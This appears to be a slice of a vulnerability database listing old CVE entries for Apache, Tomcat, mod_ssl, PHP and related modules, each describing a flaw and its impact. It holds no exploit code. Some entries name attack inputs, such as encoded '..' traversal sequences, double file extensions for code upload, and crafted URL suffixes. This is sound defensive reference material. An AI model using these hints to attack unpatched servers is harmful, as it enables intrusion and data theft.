6529| [CVE-2005-0108] Apache mod_auth_radius 1.5.4 and libpam-radius-auth allow remote malicious RADIUS servers to cause a denial of service (crash) via a RADIUS_REPLY_MESSAGE with a RADIUS attribute length of 1, which leads to a memcpy operation with a -1 length argument.
6530| [CVE-2004-2734] webadmin-apache.conf in Novell Web Manager of Novell NetWare 6.5 uses an uppercase Alias tag with an inconsistent lowercase directory tag for a volume, which allows remote attackers to bypass access control to the WEB-INF folder.
6531| [CVE-2004-2680] mod_python (libapache2-mod-python) 3.1.4 and earlier does not properly handle when output filters process more than 16384 bytes, which can cause filter.read to return portions of previously freed memory.
6532| [CVE-2004-2650] Spooler in Apache Foundation James 2.2.0 allows local users to cause a denial of service (memory consumption) by triggering various error conditions in the retrieve function, which prevents a lock from being released and causes a memory leak.
6533| [CVE-2004-2343] ** DISPUTED ** Apache HTTP Server 2.0.47 and earlier allows local users to bypass .htaccess file restrictions, as specified in httpd.conf with directives such as Deny From All, by using an ErrorDocument directive. NOTE: the vendor has disputed this issue, since the .htaccess mechanism is only intended to restrict external web access, and a local user already has the privileges to perform the same operations without using ErrorDocument.
6534| [CVE-2004-2336] Unknown vulnerability in Novell GroupWise and GroupWise WebAccess 6.0 through 6.5, when running with Apache Web Server 1.3 for NetWare where Apache is loaded using GWAPACHE.CONF, allows remote attackers to read directories and files on the server.
6535| [CVE-2004-2115] Multiple cross-site scripting (XSS) vulnerabilities in Oracle HTTP Server 1.3.22, based on Apache, allow remote attackers to execute arbitrary script as other users via the (1) action, (2) username, or (3) password parameters in an isqlplus request.
6536| [CVE-2004-1834] mod_disk_cache in Apache 2.0 through 2.0.49 stores client headers, including authentication information, on the hard disk, which could allow local users to gain sensitive information.
6537| [CVE-2004-1765] Off-by-one buffer overflow in ModSecurity (mod_security) 1.7.4 for Apache 2.x, when SecFilterScanPost is enabled, allows remote attackers to execute arbitrary code via crafted POST requests.
6538| [CVE-2004-1545] UploadFile.php in MoniWiki 1.0.9.2 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.hwp, which allows remote attackers to upload and execute arbitrary code.
6539| [CVE-2004-1438] The mod_authz_svn Apache module for Subversion 1.0.4-r1 and earlier allows remote authenticated users, with write access to the repository, to read unauthorized parts of the repository via the svn copy command.
6540| [CVE-2004-1405] MediaWiki 1.3.8 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
6541| [CVE-2004-1404] Attachment Mod 2.3.10 module for phpBB, when used with Apache mod_mime, does not properly handle files with multiple file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
6542| [CVE-2004-1387] The check_forensic script in apache-utils package 1.3.31 allows local users to overwrite or create arbitrary files via a symlink attack on temporary files.
6543| [CVE-2004-1084] Apache for Apple Mac OS X 10.2.8 and 10.3.6 allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+, which bypass Apache file handles.
6544| [CVE-2004-1083] Apache for Apple Mac OS X 10.2.8 and 10.3.6 restricts access to files in a case sensitive manner, but the Apple HFS+ filesystem accesses files in a case insensitive manner, which allows remote attackers to read .DS_Store files and files beginning with ".ht" using alternate capitalization.
6545| [CVE-2004-1082] mod_digest_apple for Apache 1.3.31 and 1.3.32 on Mac OS X Server does not properly verify the nonce of a client response, which allows remote attackers to replay credentials.
6546| [CVE-2004-0942] Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.
6547| [CVE-2004-0940] Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.
6548| [CVE-2004-0885] The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration.
6549| [CVE-2004-0811] Unknown vulnerability in Apache 2.0.51 prevents "the merging of the Satisfy directive," which could allow attackers to obtain access to restricted resources contrary to the specified authentication configuration.
6550| [CVE-2004-0809] The mod_dav module in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (child process crash) via a certain sequence of LOCK requests for a location that allows WebDAV authoring access.
6551| [CVE-2004-0786] The IPv6 URI parsing routines in the apr-util library for Apache 2.0.50 and earlier allow remote attackers to cause a denial of service (child process crash) via a certain URI, as demonstrated using the Codenomicon HTTP Test Tool.
6552| [CVE-2004-0751] The char_buffer_read function in the mod_ssl module for Apache 2.x, when using reverse proxying to an SSL server, allows remote attackers to cause a denial of service (segmentation fault).
6553| [CVE-2004-0748] mod_ssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (CPU consumption) by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop.
6554| [CVE-2004-0747] Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables.
6555| [CVE-2004-0700] Format string vulnerability in the mod_proxy hook functions function in ssl_engine_log.c in mod_ssl before 2.8.19 for Apache before 1.3.31 may allow remote attackers to execute arbitrary messages via format string specifiers in certain log messages for HTTPS that are handled by the ssl_log function.
6556| [CVE-2004-0646] Buffer overflow in the WriteToLog function for JRun 3.0 through 4.0 web server connectors, such as (1) mod_jrun and (2) mod_jrun20 for Apache, with verbose logging enabled, allows remote attackers to execute arbitrary code via a long HTTP header Content-Type field or other fields.
6557| [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
6558| [CVE-2004-0493] The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.
6559| [CVE-2004-0492] Heap-based buffer overflow in proxy_util.c for mod_proxy in Apache 1.3.25 to 1.3.31 allows remote attackers to cause a denial of service (process crash) and possibly execute arbitrary code via a negative Content-Length HTTP header field, which causes a large amount of data to be copied.
6560| [CVE-2004-0490] cPanel, when compiling Apache 1.3.29 and PHP with the mod_phpsuexec option, does not set the --enable-discard-path option, which causes php to use the SCRIPT_FILENAME variable to find and execute a script instead of the PATH_TRANSLATED variable, which allows local users to execute arbitrary PHP code as other users via a URL that references the attacker's script after the user's script, which executes the attacker's script with the user's privileges, a different vulnerability than CVE-2004-0529.
6561| [CVE-2004-0488] Stack-based buffer overflow in the ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl, when mod_ssl is configured to trust the issuing CA, may allow remote attackers to execute arbitrary code via a client certificate with a long subject DN.
6562| [CVE-2004-0263] PHP 4.3.4 and earlier in Apache 1.x and 2.x (mod_php) can leak global variables between virtual hosts that are handled by the same Apache child process but have different settings, which could allow remote attackers to obtain sensitive information.
6563| [CVE-2004-0174] Apache 1.4.x before 1.3.30, and 2.0.x before 2.0.49, when using multiple listening sockets on certain platforms, allows remote attackers to cause a denial of service (blocked new connections) via a "short-lived connection on a rarely-accessed listening socket."
6564| [CVE-2004-0173] Directory traversal vulnerability in Apache 1.3.29 and earlier, and Apache 2.0.48 and earlier, when running on Cygwin, allows remote attackers to read arbitrary files via a URL containing "..%5C" (dot dot encoded backslash) sequences.
6565| [CVE-2004-0113] Memory leak in ssl_engine_io.c for mod_ssl in Apache 2 before 2.0.49 allows remote attackers to cause a denial of service (memory consumption) via plain HTTP requests to the SSL port of an SSL-enabled server.
6566| [CVE-2004-0009] Apache-SSL 1.3.28+1.52 and earlier, with SSLVerifyClient set to 1 or 3 and SSLFakeBasicAuth enabled, allows remote attackers to forge a client certificate by using basic authentication with the "one-line DN" of the target user.
6567| [CVE-2003-1581] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files via an HTTP request in conjunction with a crafted DNS response, as demonstrated by injecting XSS sequences, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
6568| [CVE-2003-1580] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
6569| [CVE-2003-1573] The PointBase 4.6 database component in the J2EE 1.4 reference implementation (J2EE/RI) allows remote attackers to execute arbitrary programs, conduct a denial of service, and obtain sensitive information via a crafted SQL statement, related to "inadequate security settings and library bugs in sun.* and org.apache.* packages."
6570| [CVE-2003-1521] Sun Java Plug-In 1.4 through 1.4.2_02 allows remote attackers to repeatedly access the floppy drive via the createXmlDocument method in the org.apache.crimson.tree.XmlDocument class, which violates the Java security model.
6571| [CVE-2003-1516] The org.apache.xalan.processor.XSLProcessorVersion class in Java Plug-in 1.4.2_01 allows signed and unsigned applets to share variables, which violates the Java security model and could allow remote attackers to read or write data belonging to a signed applet.
6572| [CVE-2003-1502] mod_throttle 3.0 allows local users with Apache privileges to access shared memory that points to a file that is writable by the apache user, which could allow local users to gain privileges.
6573| [CVE-2003-1418] Apache HTTP Server 1.3.22 through 1.3.27 on OpenBSD allows remote attackers to obtain sensitive information via (1) the ETag header, which reveals the inode number, or (2) multipart MIME boundary, which reveals child proccess IDs (PID).
6574| [CVE-2003-1307] ** DISPUTED ** The mod_php module for the Apache HTTP Server allows local users with write access to PHP scripts to send signals to the server's process group and use the server's file descriptors, as demonstrated by sending a STOP signal, then intercepting incoming connections on the server's TCP port. NOTE: the PHP developer has disputed this vulnerability, saying "The opened file descriptors are opened by Apache. It is the job of Apache to protect them ... Not a bug in PHP."
6575| [CVE-2003-1172] Directory traversal vulnerability in the view-source sample file in Apache Software Foundation Cocoon 2.1 and 2.2 allows remote attackers to access arbitrary files via a .. (dot dot) in the filename parameter.
6576| [CVE-2003-1171] Heap-based buffer overflow in the sec_filter_out function in mod_security 1.7RC1 through 1.7.1 in Apache 2 allows remote attackers to execute arbitrary code via a server side script that sends a large amount of data.
6577| [CVE-2003-1138] The default configuration of Apache 2.0.40, as shipped with Red Hat Linux 9.0, allows remote attackers to list directory contents, even if auto indexing is turned off and there is a default web page configured, via a GET request containing a double slash (//).
6578| [CVE-2003-1054] mod_access_referer 1.0.2 allows remote attackers to cause a denial of service (crash) via a malformed Referer header that is missing a hostname, as parsed by the ap_parse_uri_components function in Apache, which triggers a null dereference.
6579| [CVE-2003-0993] mod_access in Apache 1.3 before 1.3.30, when running big-endian 64-bit platforms, does not properly parse Allow/Deny rules using IP addresses without a netmask, which could allow remote attackers to bypass intended access restrictions.
6580| [CVE-2003-0987] mod_digest for Apache before 1.3.31 does not properly verify the nonce of a client response by using a AuthNonce secret.
6581| [CVE-2003-0866] The Catalina org.apache.catalina.connector.http package in Tomcat 4.0.x up to 4.0.3 allows remote attackers to cause a denial of service via several requests that do not follow the HTTP protocol, which causes Tomcat to reject later requests.
6582| [CVE-2003-0844] mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode without the Apache log, allows local users to overwrite arbitrary files via (1) a symlink attack on predictable temporary filenames on Unix systems, or (2) an NTFS hard link on Windows systems when the "Strengthen default permissions of internal system objects" policy is not enabled.
6583| [CVE-2003-0843] Format string vulnerability in mod_gzip_printf for mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode and using the Apache log, allows remote attackers to execute arbitrary code via format string characters in an HTTP GET request with an "Accept-Encoding: gzip" header.
6584| [CVE-2003-0789] mod_cgid in Apache before 2.0.48, when using a threaded MPM, does not properly handle CGI redirect paths, which could cause Apache to send the output of a CGI program to the wrong client.
6585| [CVE-2003-0771] Gallery.pm in Apache::Gallery (aka A::G) uses predictable temporary filenames when running Inline::C, which allows local users to execute arbitrary code by creating and modifying the files before Apache::Gallery does.
6586| [CVE-2003-0658] Docview before 1.1-18 in Caldera OpenLinux 3.1.1, SCO Linux 4.0, OpenServer 5.0.7, configures the Apache web server in a way that allows remote attackers to read arbitrary publicly readable files via a certain URL, possibly related to rewrite rules.
6587| [CVE-2003-0542] Multiple stack-based buffer overflows in (1) mod_alias and (2) mod_rewrite for Apache before 1.3.29 allow attackers to create configuration files to cause a denial of service (crash) or execute arbitrary code via a regular expression with more than 9 captures.
6588| [CVE-2003-0460] The rotatelogs program on Apache before 1.3.28, for Windows and OS/2 systems, does not properly ignore certain control characters that are received over the pipe, which could allow remote attackers to cause a denial of service.
6589| [CVE-2003-0254] Apache 2 before 2.0.47, when running on an IPv6 host, allows attackers to cause a denial of service (CPU consumption by infinite loop) when the FTP proxy server fails to create an IPv6 socket.
6590| [CVE-2003-0253] The prefork MPM in Apache 2 before 2.0.47 does not properly handle certain errors from accept, which could lead to a denial of service.
6591| [CVE-2003-0249] ** DISPUTED ** PHP treats unknown methods such as "PoSt" as a GET request, which could allow attackers to intended access restrictions if PHP is running on a server that passes on all methods, such as Apache httpd 2.0, as demonstrated using a Limit directive. NOTE: this issue has been disputed by the Apache security team, saying "It is by design that PHP allows scripts to process any request method. A script which does not explicitly verify the request method will hence be processed as normal for arbitrary methods. It is therefore expected behaviour that one cannot implement per-method access control using the Apache configuration alone, which is the assumption made in this report."
6592| [CVE-2003-0245] Vulnerability in the apr_psprintf function in the Apache Portable Runtime (APR) library for Apache 2.0.37 through 2.0.45 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long strings, as demonstrated using XML objects to mod_dav, and possibly other vectors.
6593| [CVE-2003-0192] Apache 2 before 2.0.47, and certain versions of mod_ssl for Apache 1.3, do not properly handle "certain sequences of per-directory renegotiations and the SSLCipherSuite directive being used to upgrade from a weak ciphersuite to a strong one," which could cause Apache to use the weak ciphersuite.
6594| [CVE-2003-0189] The authentication module for Apache 2.0.40 through 2.0.45 on Unix does not properly handle threads safely when using the crypt_r or crypt functions, which allows remote attackers to cause a denial of service (failed Basic authentication with valid usernames and passwords) when a threaded MPM is used.
6595| [CVE-2003-0134] Unknown vulnerability in filestat.c for Apache running on OS2, versions 2.0 through 2.0.45, allows unknown attackers to cause a denial of service via requests related to device names.
6596| [CVE-2003-0132] A memory leak in Apache 2.0 through 2.0.44 allows remote attackers to cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.
6597| [CVE-2003-0083] Apache 1.3 before 1.3.25 and Apache 2.0 before version 2.0.46 does not filter terminal escape sequences from its access logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences, a different vulnerability than CVE-2003-0020.
6598| [CVE-2003-0020] Apache does not filter terminal escape sequences from its error logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences.
6599| [CVE-2003-0017] Apache 2.0 before 2.0.44 on Windows platforms allows remote attackers to obtain certain files via an HTTP request that ends in certain illegal characters such as ">", which causes a different filename to be processed and served.
6600| [CVE-2003-0016] Apache before 2.0.44, when running on unpatched Windows 9x and Me operating systems, allows remote attackers to cause a denial of service or execute arbitrary code via an HTTP request containing MS-DOS device names.
6601| [CVE-2002-2310] ClickCartPro 4.0 stores the admin_user.db data file under the web document root with insufficient access control on servers other than Apache, which allows remote attackers to obtain usernames and passwords.
6602| [CVE-2002-2309] php.exe in PHP 3.0 through 4.2.2, when running on Apache, does not terminate properly, which allows remote attackers to cause a denial of service via a direct request without arguments.
6603| [CVE-2002-2272] Tomcat 4.0 through 4.1.12, using mod_jk 1.2.1 module on Apache 1.3 through 1.3.27, allows remote attackers to cause a denial of service (desynchronized communications) via an HTTP GET request with a Transfer-Encoding chunked field with invalid values.
6604| [CVE-2002-2103] Apache before 1.3.24, when writing to the log file, records a spoofed hostname from the reverse lookup of an IP address, even when a double-reverse lookup fails, which allows remote attackers to hide the original source of activities.
6605| [CVE-2002-2029] PHP, when installed on Windows with Apache and ScriptAlias for /php/ set to c:/php/, allows remote attackers to read arbitrary files and possibly execute arbitrary programs via an HTTP request for php.exe with a filename in the query string.
6606| [CVE-2002-2012] Unknown vulnerability in Apache 1.3.19 running on HP Secure OS for Linux 1.0 allows remote attackers to cause "unexpected results" via an HTTP request.
6607| [CVE-2002-2009] Apache Tomcat 4.0.1 allows remote attackers to obtain the web root path via HTTP requests for JSP files preceded by (1) +/, (2) >/, (3) </, and (4) %20/, which leaks the pathname in an error message.
6608| [CVE-2002-2008] Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message.
6609| [CVE-2002-2007] The default installations of Apache Tomcat 3.2.3 and 3.2.4 allows remote attackers to obtain sensitive system information such as directory listings and web root path, via erroneous HTTP requests for Java Server Pages (JSP) in the (1) test/jsp, (2) samples/jsp and (3) examples/jsp directories, or the (4) test/realPath.jsp servlet, which leaks pathnames in error messages.
6610| [CVE-2002-2006] The default installation of Apache Tomcat 4.0 through 4.1 and 3.0 through 3.3.1 allows remote attackers to obtain the installation path and other sensitive system information via the (1) SnoopServlet or (2) TroubleShooter example servlets.
6611| [CVE-2002-1895] The servlet engine in Jakarta Apache Tomcat 3.3 and 4.0.4, when using IIS and the ajp1.3 connector, allows remote attackers to cause a denial of service (crash) via a large number of HTTP GET requests for an MS-DOS device such as AUX, LPT1, CON, or PRN.
6612| [CVE-2002-1850] mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script.
6613| [CVE-2002-1793] HTTP Server mod_ssl module running on HP-UX 11.04 with Virtualvault OS (VVOS) 4.5 through 4.6 closes the connection when the Apache server times out during an SSL request, which may allow attackers to cause a denial of service.
6614| [CVE-2002-1658] Buffer overflow in htdigest in Apache 1.3.26 and 1.3.27 may allow attackers to execute arbitrary code via a long user argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
6615| [CVE-2002-1635] The Apache configuration file (httpd.conf) in Oracle 9i Application Server (9iAS) uses a Location alias for /perl directory instead of a ScriptAlias, which allows remote attackers to read the source code of arbitrary CGI files via a URL containing the /perl directory instead of /cgi-bin.
6616| [CVE-2002-1593] mod_dav in Apache before 2.0.42 does not properly handle versioning hooks, which may allow remote attackers to kill a child process via a null dereference and cause a denial of service (CPU consumption) in a preforked multi-processing module.
6617| [CVE-2002-1592] The ap_log_rerror function in Apache 2.0 through 2.035, when a CGI application encounters an error, sends error messages to the client that include the full path for the server, which allows remote attackers to obtain sensitive information.
6618| [CVE-2002-1567] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1 allows remote attackers to execute arbitrary web script and steal cookies via a URL with encoded newlines followed by a request to a .jsp file whose name contains the script.
6619| [CVE-2002-1394] Apache Tomcat 4.0.5 and earlier, when using both the invoker servlet and the default servlet, allows remote attackers to read source code for server files or bypass certain protections, a variant of CAN-2002-1148.
6620| [CVE-2002-1233] A regression error in the Debian distributions of the apache-ssl package (before 1.3.9 on Debian 2.2, and before 1.3.26 on Debian 3.0), for Apache 1.3.27 and earlier, allows local users to read or modify the Apache password file via a symlink attack on temporary files when the administrator runs (1) htpasswd or (2) htdigest, a re-introduction of a vulnerability that was originally identified and addressed by CVE-2001-0131.
6621| [CVE-2002-1157] Cross-site scripting vulnerability in the mod_ssl Apache module 2.8.9 and earlier, when UseCanonicalName is off and wildcard DNS is enabled, allows remote attackers to execute script as other web site visitors, via the server name in an HTTPS response on the SSL port, which is used in a self-referencing URL, a different vulnerability than CAN-2002-0840.
6622| [CVE-2002-1156] Apache 2.0.42 allows remote attackers to view the source code of a CGI script via a POST request to a directory with both WebDAV and CGI enabled.
6623| [CVE-2002-1148] The default servlet (org.apache.catalina.servlets.DefaultServlet) in Tomcat 4.0.4 and 4.1.10 and earlier allows remote attackers to read source code for server files via a direct request to the servlet.
6624| [CVE-2002-0935] Apache Tomcat 4.0.3, and possibly other versions before 4.1.3 beta, allows remote attackers to cause a denial of service (resource exhaustion) via a large number of requests to the server with null characters, which causes the working threads to hang.
6625| [CVE-2002-0843] Buffer overflows in the ApacheBench benchmark support program (ab.c) in Apache before 1.3.27, and Apache 2.x before 2.0.43, allow a malicious web server to cause a denial of service and possibly execute arbitrary code via a long response.
6626| [CVE-2002-0840] Cross-site scripting (XSS) vulnerability in the default error page of Apache 2.0 before 2.0.43, and 1.3.x up to 1.3.26, when UseCanonicalName is "Off" and support for wildcard DNS is present, allows remote attackers to execute script as other web page visitors via the Host: header, a different vulnerability than CAN-2002-1157.
6627| [CVE-2002-0839] The shared memory scoreboard in the HTTP daemon for Apache 1.3.x before 1.3.27 allows any user running as the Apache UID to send a SIGUSR1 signal to any process as root, resulting in a denial of service (process kill) or possibly other behaviors that would not normally be allowed, by modifying the parent[].pid and parent[].last_rtime segments in the scoreboard.
6628| [CVE-2002-0682] Cross-site scripting vulnerability in Apache Tomcat 4.0.3 allows remote attackers to execute script as other web users via script in a URL with the /servlet/ mapping, which does not filter the script when an exception is thrown by the servlet.
6629| [CVE-2002-0661] Directory traversal vulnerability in Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to read arbitrary files and execute commands via .. (dot dot) sequences containing \ (backslash) characters.
6630| [CVE-2002-0658] OSSP mm library (libmm) before 1.2.0 allows the local Apache user to gain privileges via temporary files, possibly via a symbolic link attack.
6631| [CVE-2002-0654] Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to determine the full pathname of the server via (1) a request for a .var file, which leaks the pathname in the resulting error message, or (2) via an error message that occurs when a script (child process) cannot be invoked.
6632| [CVE-2002-0653] Off-by-one buffer overflow in the ssl_compat_directive function, as called by the rewrite_command hook for mod_ssl Apache module 2.8.9 and earlier, allows local users to execute arbitrary code as the Apache server user via .htaccess files with long entries.
6633| [CVE-2002-0513] The PHP administration script in popper_mod 1.2.1 and earlier relies on Apache .htaccess authentication, which allows remote attackers to gain privileges if the script is not appropriately configured by the administrator.
6634| [CVE-2002-0493] Apache Tomcat may be started without proper security settings if errors are encountered while reading the web.xml file, which could allow attackers to bypass intended restrictions.
6635| [CVE-2002-0392] Apache 1.3 through 1.3.24, and Apache 2.0 through 2.0.36, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a chunk-encoded HTTP request that causes Apache to use an incorrect size.
6636| [CVE-2002-0259] InstantServers MiniPortal 1.1.5 and earlier stores sensitive login and account data in plaintext in (1) .pwd files in the miniportal/apache directory, or (2) mplog.txt, which could allow local users to gain privileges.
6637| [CVE-2002-0249] PHP for Windows, when installed on Apache 2.0.28 beta as a standalone CGI module, allows remote attackers to obtain the physical path of the php.exe via a request with malformed arguments such as /123, which leaks the pathname in the error message.
6638| [CVE-2002-0240] PHP, when installed with Apache and configured to search for index.php as a default web page, allows remote attackers to obtain the full pathname of the server via the HTTP OPTIONS method, which reveals the pathname in the resulting error message.
6639| [CVE-2002-0082] The dbm and shm session cache code in mod_ssl before 2.8.7-1.3.23, and Apache-SSL before 1.3.22+1.46, does not properly initialize memory using the i2d_SSL_SESSION function, which allows remote attackers to use a buffer overflow to execute arbitrary code via a large client certificate that is signed by a trusted Certificate Authority (CA), which produces a large serialized session.
6640| [CVE-2002-0061] Apache for Win32 before 1.3.24, and 2.0.x before 2.0.34-beta, allows remote attackers to execute arbitrary commands via shell metacharacters (a | pipe character) provided as arguments to batch (.bat) or .cmd scripts, which are sent unfiltered to the shell interpreter, typically cmd.exe.
6641| [CVE-2001-1556] The log files in Apache web server contain information directly supplied by clients and does not filter or quote control characters, which could allow remote attackers to hide HTTP requests and spoof source IP addresses when logs are viewed with UNIX programs such as cat, tail, and grep.
6642| [CVE-2001-1534] mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication.
6643| [CVE-2001-1510] Allaire JRun 2.3.3, 3.0 and 3.1 running on IIS 4.0 and 5.0, iPlanet, Apache, JRun web server (JWS), and possibly other web servers allows remote attackers to read arbitrary files and directories by appending (1) "%3f.jsp", (2) "?.jsp" or (3) "?" to the requested URL.
6644| [CVE-2001-1449] The default installation of Apache before 1.3.19 on Mandrake Linux 7.1 through 8.0 and Linux Corporate Server 1.0.1 allows remote attackers to list the directory index of arbitrary web directories.
6645| [CVE-2001-1385] The Apache module for PHP 4.0.0 through PHP 4.0.4, when disabled with the 'engine = off' option for a virtual host, may disable PHP for other virtual hosts, which could cause Apache to serve the source code of PHP scripts.
6646| [CVE-2001-1342] Apache before 1.3.20 on Windows and OS/2 systems allows remote attackers to cause a denial of service (GPF) via an HTTP request for a URI that contains a large number of / (slash) or other characters, which causes certain functions to dereference a null pointer.
6647| [CVE-2001-1217] Directory traversal vulnerability in PL/SQL Apache module in Oracle Oracle 9i Application Server allows remote attackers to access sensitive information via a double encoded URL with .. (dot dot) sequences.
6648| [CVE-2001-1216] Buffer overflow in PL/SQL Apache module in Oracle 9i Application Server allows remote attackers to execute arbitrary code via a long request for a help page.
6649| [CVE-2001-1072] Apache with mod_rewrite enabled on most UNIX systems allows remote attackers to bypass RewriteRules by inserting extra / (slash) characters into the requested path, which causes the regular expression in the RewriteRule to fail.
6650| [CVE-2001-1013] Apache on Red Hat Linux with with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.
6651| [CVE-2001-0925] The default installation of Apache before 1.3.19 allows remote attackers to list directories instead of the multiview index.html file via an HTTP request for a path that contains many / (slash) characters, which causes the path to be mishandled by (1) mod_negotiation, (2) mod_dir, or (3) mod_autoindex.
6652| [CVE-2001-0829] A cross-site scripting vulnerability in Apache Tomcat 3.2.1 allows a malicious webmaster to embed Javascript in a request for a .JSP file, which causes the Javascript to be inserted into an error message.
6653| [CVE-2001-0766] Apache on MacOS X Client 10.0.3 with the HFS+ file system allows remote attackers to bypass access restrictions via a URL that contains some characters whose case is not matched by Apache's filters.
6654| [CVE-2001-0731] Apache 1.3.20 with Multiviews enabled allows remote attackers to view directory contents and bypass the index page via a URL containing the "M=D" query string.
6655| [CVE-2001-0730] split-logfile in Apache 1.3.20 allows remote attackers to overwrite arbitrary files that end in the .log extension via an HTTP request with a / (slash) in the Host: header.
6656| [CVE-2001-0729] Apache 1.3.20 on Windows servers allows remote attackers to bypass the default index page and list directory contents via a URL with a large number of / (slash) characters.
6657| [CVE-2001-0590] Apache Software Foundation Tomcat Servlet prior to 3.2.2 allows a remote attacker to read the source code to arbitrary 'jsp' files via a malformed URL request which does not end with an HTTP protocol specification (i.e. HTTP/1.0).
6658| [CVE-2001-0131] htpasswd and htdigest in Apache 2.0a9, 1.3.14, and others allows local users to overwrite arbitrary files via a symlink attack.
6659| [CVE-2001-0108] PHP Apache module 4.0.4 and earlier allows remote attackers to bypass .htaccess access restrictions via a malformed HTTP request on an unrestricted page that causes PHP to use those access controls on the next page that is requested.
6660| [CVE-2001-0042] PHP 3.x (PHP3) on Apache 1.3.6 allows remote attackers to read arbitrary files via a modified .. (dot dot) attack containing "%5c" (encoded backslash) sequences.
6661| [CVE-2000-1247] The default configuration of the jserv-status handler in jserv.conf in Apache JServ 1.1.2 includes an "allow from 127.0.0.1" line, which allows local users to discover JDBC passwords or other sensitive information via a direct request to the jserv/ URI.
6662| [CVE-2000-1210] Directory traversal vulnerability in source.jsp of Apache Tomcat before 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the argument to source.jsp.
6663| [CVE-2000-1206] Vulnerability in Apache httpd before 1.3.11, when configured for mass virtual hosting using mod_rewrite, or mod_vhost_alias in Apache 1.3.9, allows remote attackers to retrieve arbitrary files.
6664| [CVE-2000-1205] Cross site scripting vulnerabilities in Apache 1.3.0 through 1.3.11 allow remote attackers to execute script as other web site visitors via (1) the printenv CGI (printenv.pl), which does not encode its output, (2) pages generated by the ap_send_error_response function such as a default 404, which does not add an explicit charset, or (3) various messages that are generated by certain Apache modules or core code. NOTE: the printenv issue might still exist for web browsers that can render text/plain content types as HTML, such as Internet Explorer, but CVE regards this as a design limitation of those browsers, not Apache. The printenv.pl/acuparam vector, discloser on 20070724, is one such variant.
6665| [CVE-2000-1204] Vulnerability in the mod_vhost_alias virtual hosting module for Apache 1.3.9, 1.3.11 and 1.3.12 allows remote attackers to obtain the source code for CGI programs if the cgi-bin directory is under the document root.
6666| [CVE-2000-1168] IBM HTTP Server 1.3.6 (based on Apache) allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long GET request.
6667| [CVE-2000-1016] The default configuration of Apache (httpd.conf) on SuSE 6.4 includes an alias for the /usr/doc directory, which allows remote attackers to read package documentation and obtain system configuration information via an HTTP request for the /doc/packages URL.
6668| [CVE-2000-0913] mod_rewrite in Apache 1.3.12 and earlier allows remote attackers to read arbitrary files if a RewriteRule directive is expanded to include a filename whose name contains a regular expression.
6669| [CVE-2000-0883] The default configuration of mod_perl for Apache as installed on Mandrake Linux 6.1 through 7.1 sets the /perl/ directory to be browseable, which allows remote attackers to list the contents of that directory.
6670| [CVE-2000-0869] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 enables WebDAV, which allows remote attackers to list arbitrary diretories via the PROPFIND HTTP request method.
6671| [CVE-2000-0868] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 allows remote attackers to read source code for CGI scripts by replacing the /cgi-bin/ in the requested URL with /cgi-bin-sdb/.
6672| [CVE-2000-0791] Trustix installs the httpsd program for Apache-SSL with world-writeable permissions, which allows local users to replace it with a Trojan horse.
